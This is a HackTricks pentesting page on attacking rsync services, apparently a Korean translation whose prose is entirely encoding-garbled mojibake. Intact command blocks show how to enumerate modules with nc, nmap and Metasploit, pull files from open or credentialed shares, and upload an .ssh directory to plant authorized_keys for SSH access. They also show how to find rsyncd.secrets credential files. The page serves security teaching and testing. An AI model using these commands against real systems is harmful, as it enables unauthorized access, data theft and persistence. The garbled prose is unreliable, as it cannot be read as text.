# 873 - Pentesting Rsync
{% hint style="success" %}
Learn & practice AWS Hacking:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: 
[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}
## **κΈ°λ³Έ μ 보**
From [wikipedia](https://en.wikipedia.org/wiki/Rsync):
> **rsync**λ μ»΄ν¨ν°μ μΈμ₯ νλ λλΌμ΄λΈ κ°, κ·Έλ¦¬κ³ [λ€νΈμν¬νλ](https://en.wikipedia.org/wiki/Computer\_network) [μ»΄ν¨ν°](https://en.wikipedia.org/wiki/Computer) κ°μ [νμΌ](https://en.wikipedia.org/wiki/Computer\_file)μ ν¨μ¨μ μΌλ‘ [μ μ‘](https://en.wikipedia.org/wiki/File\_transfer)νκ³ [λκΈ°ν](https://en.wikipedia.org/wiki/File\_synchronization)νλ μ νΈλ¦¬ν°λ‘, [μμ μκ°](https://en.wikipedia.org/wiki/Timestamping\_\(computing\))κ³Ό νμΌ ν¬κΈ°λ₯Ό λΉκ΅νμ¬ μλν©λλ€.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) μΌλ°μ μΌλ‘ [μ λμ€ κ³μ΄](https://en.wikipedia.org/wiki/Unix-like) [μ΄μ 체μ ](https://en.wikipedia.org/wiki/Operating\_system)μμ λ°κ²¬λ©λλ€. rsync μκ³ λ¦¬μ¦μ [λΈν μΈμ½λ©](https://en.wikipedia.org/wiki/Delta\_encoding)μ μΌμ’
μ΄λ©°, λ€νΈμν¬ μ¬μ©μ μ΅μννλ λ° μ¬μ©λ©λλ€. [Zlib](https://en.wikipedia.org/wiki/Zlib)λ μΆκ°μ μΈ [λ°μ΄ν° μμΆ](https://en.wikipedia.org/wiki/Data\_compression)μ μ¬μ©λ μ μμΌλ©°,[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite\_note-man\_page-3) [SSH](https://en.wikipedia.org/wiki/Secure\_Shell) λλ [stunnel](https://en.wikipedia.org/wiki/Stunnel)μ 보μμ μν΄ μ¬μ©λ μ μμ΅λλ€.
**κΈ°λ³Έ ν¬νΈ:** 873
```
PORT STATE SERVICE REASON
873/tcp open rsync syn-ack
```
## μ΄κ±°
### λ°°λ λ° μλ ν΅μ
```bash
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0 <--- You receive this banner with the version from the server
@RSYNCD: 31.0 <--- Then you send the same info
#list <--- Then you ask the sever to list
raidroot <--- The server starts enumerating
USBCopy
NAS_Public
_NAS_Recycle_TOSRAID <--- Enumeration finished
@RSYNCD: EXIT <--- Sever closes the connection
#Now lets try to enumerate "raidroot"
nc -vn 127.0.0.1 873
(UNKNOWN) [127.0.0.1] 873 (rsync) open
@RSYNCD: 31.0
@RSYNCD: 31.0
raidroot
@RSYNCD: AUTHREQD 7H6CqsHCPG06kRiFkKwD8g <--- This means you need the password
```
### **곡μ ν΄λ μ΄κ±°νκΈ°**
**Rsync λͺ¨λ**μ **λΉλ°λ²νΈλ‘ 보νΈλ μ μλ λλ ν 리 곡μ **λ‘ μΈμλ©λλ€. μ¬μ© κ°λ₯ν λͺ¨λμ μλ³νκ³ λΉλ°λ²νΈκ° νμνμ§ νμΈνκΈ° μν΄ λ€μ λͺ
λ Ήμ΄λ₯Ό μ¬μ©ν©λλ€:
```bash
nmap -sV --script "rsync-list-modules" -p
msf> use auxiliary/scanner/rsync/modules_list
# Example with IPv6 and alternate port
rsync -av --list-only rsync://[dead:beef::250:56ff:feb9:e90a]:8730
```
μΌλΆ 곡μ κ° λͺ©λ‘μ λνλμ§ μμ μ μμΌλ©°, μ΄λ μ¨κ²¨μ Έ μμ μ μμ΅λλ€. λν, μΌλΆ 곡μ μ μ κ·Όνλ κ²μ νΉμ **μ격 μ¦λͺ
**μ μ νλ μ μμΌλ©°, μ΄λ **"Access Denied"** λ©μμ§λ‘ νμλ©λλ€.
### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsync)
### μλ Rsync μ¬μ©
**λͺ¨λ λͺ©λ‘**μ μ»μ ν, μμ
μ μΈμ¦μ΄ νμνμ§ μ¬λΆμ λ°λΌ λ¬λΌμ§λλ€. μΈμ¦ μμ΄ **λͺ©λ‘**μ μμ±νκ³ κ³΅μ ν΄λμμ λ‘컬 λλ ν λ¦¬λ‘ νμΌμ **볡μ¬**νλ κ²μ λ€μμ ν΅ν΄ μνλ©λλ€:
```bash
# Listing a shared folder
rsync -av --list-only rsync://192.168.0.123/shared_name
# Copying files from a shared folder
rsync -av rsync://192.168.0.123:8730/shared_name ./rsyn_shared
```
μ΄ νλ‘μΈμ€λ **μ¬κ·μ μΌλ‘ νμΌμ μ μ‘**νλ©°, νμΌμ μμ±κ³Ό κΆνμ μ μ§ν©λλ€.
**μ격 μ¦λͺ
**μ μ¬μ©νλ©΄ 곡μ ν΄λμμ λͺ©λ‘μ μμ±νκ³ λ€μ΄λ‘λν μ μμΌλ©°, μ΄λ λΉλ°λ²νΈ μ
λ ₯ ν둬ννΈκ° λνλ©λλ€:
```bash
rsync -av --list-only rsync://username@192.168.0.123/shared_name
rsync -av rsync://username@192.168.0.123:8730/shared_name ./rsyn_shared
```
To **upload content**, such as an _**authorized_keys**_ νμΌμ λν μ‘μΈμ€λ₯Ό μν΄, μ¬μ©νμμμ€:
```bash
rsync -av home_user/.ssh/ rsync://username@192.168.0.123/home_user/.ssh
```
## POST
rsyncd κ΅¬μ± νμΌμ μ°ΎμΌλ €λ©΄ λ€μμ μ€ννμμμ€:
```bash
find /etc \( -name rsyncd.conf -o -name rsyncd.secrets \)
```
μ΄ νμΌ λ΄μμ _secrets file_ 맀κ°λ³μλ rsyncd μΈμ¦μ μν **μ¬μ©μ μ΄λ¦κ³Ό λΉλ°λ²νΈ**κ° ν¬ν¨λ νμΌμ κ°λ¦¬ν¬ μ μμ΅λλ€.
## References
* [https://www.smeegesec.com/2016/12/pentesting-rsync.html](https://www.smeegesec.com/2016/12/pentesting-rsync.html)
{% hint style="success" %}
Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** π¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** π¦ [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}